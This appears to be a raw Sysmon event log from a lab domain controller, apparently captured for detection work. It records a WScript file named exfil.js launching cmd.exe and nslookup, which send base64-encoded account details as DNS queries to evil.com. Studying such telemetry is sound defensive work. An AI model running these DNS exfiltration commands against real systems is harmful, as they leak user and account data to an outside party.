10341000x8000000000000000199737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.825{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.825{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-2940-000000005F02}7764C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.825{2E1864BB-17A1-629A-783D-000000005F02}55527368C:\Windows\System32\WScript.exe{2E1864BB-17BC-629A-2940-000000005F02}7764C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.830{2E1864BB-17BC-629A-2940-000000005F02}7764C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlohkgr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.825{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlitdnvs.tmpMD5=14EFE03E0C67AE598772AE00481DF4D7,SHA256=91A875FE4CE713F3E89451B0A4F3D74F67372C5460101AA4ED9323B82D4A430D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.772{2E1864BB-17BC-629A-2740-000000005F02}42286220C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-2840-000000005F02}5908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.772{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.772{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.772{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.772{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.772{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-2840-000000005F02}5908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.772{2E1864BB-17BC-629A-2640-000000005F02}78687544C:\Windows\system32\cmd.exe{2E1864BB-17BC-629A-2840-000000005F02}5908C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.781{2E1864BB-17BC-629A-2840-000000005F02}5908C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BC-629A-2640-000000005F02}7868C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlitdnvs.tmp 2>&1 354300x8000000000000000199724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.329{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52650- 354300x8000000000000000199723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.329{00000000-0000-0000-0000-000000000000}3168<unknown process>-udptruefalse127.0.0.1-52650-false127.0.0.1-53domain 354300x8000000000000000199722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.329{00000000-0000-0000-0000-000000000000}3168<unknown process>-udpfalsefalse127.0.0.1-52649-false127.0.0.1-53domain 354300x8000000000000000199721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.329{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52649- 354300x8000000000000000199720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.329{00000000-0000-0000-0000-000000000000}3168<unknown process>-udptruefalse127.0.0.1-52649-false127.0.0.1-53domain 354300x8000000000000000199719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.329{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52648- 354300x8000000000000000199718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.328{00000000-0000-0000-0000-000000000000}3168<unknown process>-udptruefalse127.0.0.1-52648-false127.0.0.1-53domain 354300x8000000000000000199717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.265{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52647- 354300x8000000000000000199716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.265{00000000-0000-0000-0000-000000000000}4540<unknown process>-udptruefalse127.0.0.1-52647-false127.0.0.1-53domain 354300x8000000000000000199715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.265{00000000-0000-0000-0000-000000000000}4540<unknown process>-udpfalsefalse127.0.0.1-52646-false127.0.0.1-53domain 354300x8000000000000000199714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.265{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52646- 354300x8000000000000000199713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.265{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52645- 354300x8000000000000000199712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.211{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52644- 354300x8000000000000000199711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.210{00000000-0000-0000-0000-000000000000}6196<unknown process>-udpfalsefalse127.0.0.1-52643-false127.0.0.1-53domain 354300x8000000000000000199710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.210{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52643- 354300x8000000000000000199709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.210{00000000-0000-0000-0000-000000000000}6196<unknown process>-udptruefalse127.0.0.1-52643-false127.0.0.1-53domain 354300x8000000000000000199708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.210{00000000-0000-0000-0000-000000000000}6196<unknown process>-udpfalsefalse127.0.0.1-52642-false127.0.0.1-53domain 354300x8000000000000000199707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.210{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52642- 354300x8000000000000000199706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.143{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52641- 354300x8000000000000000199705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.143{00000000-0000-0000-0000-000000000000}1496<unknown process>-udptruefalse127.0.0.1-52641-false127.0.0.1-53domain 354300x8000000000000000199704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.143{00000000-0000-0000-0000-000000000000}1496<unknown process>-udpfalsefalse127.0.0.1-52640-false127.0.0.1-53domain 354300x8000000000000000199703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.143{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52640- 354300x8000000000000000199702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.143{00000000-0000-0000-0000-000000000000}1496<unknown process>-udptruefalse127.0.0.1-52640-false127.0.0.1-53domain 354300x8000000000000000199701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.143{00000000-0000-0000-0000-000000000000}1496<unknown process>-udpfalsefalse127.0.0.1-52639-false127.0.0.1-53domain 354300x8000000000000000199700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.142{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52639- 354300x8000000000000000199699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.142{00000000-0000-0000-0000-000000000000}1496<unknown process>-udptruefalse127.0.0.1-52639-false127.0.0.1-53domain 10341000x8000000000000000199698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.756{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-2740-000000005F02}4228C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.741{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-2740-000000005F02}4228C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.741{2E1864BB-17BC-629A-2740-000000005F02}42286220C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-2640-000000005F02}7868C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.725{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-2740-000000005F02}4228C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.725{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.725{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.725{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.725{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.725{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-2640-000000005F02}7868C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.725{2E1864BB-17A1-629A-783D-000000005F02}55522056C:\Windows\System32\WScript.exe{2E1864BB-17BC-629A-2640-000000005F02}7868C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.727{2E1864BB-17BC-629A-2640-000000005F02}7868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlitdnvs.tmp 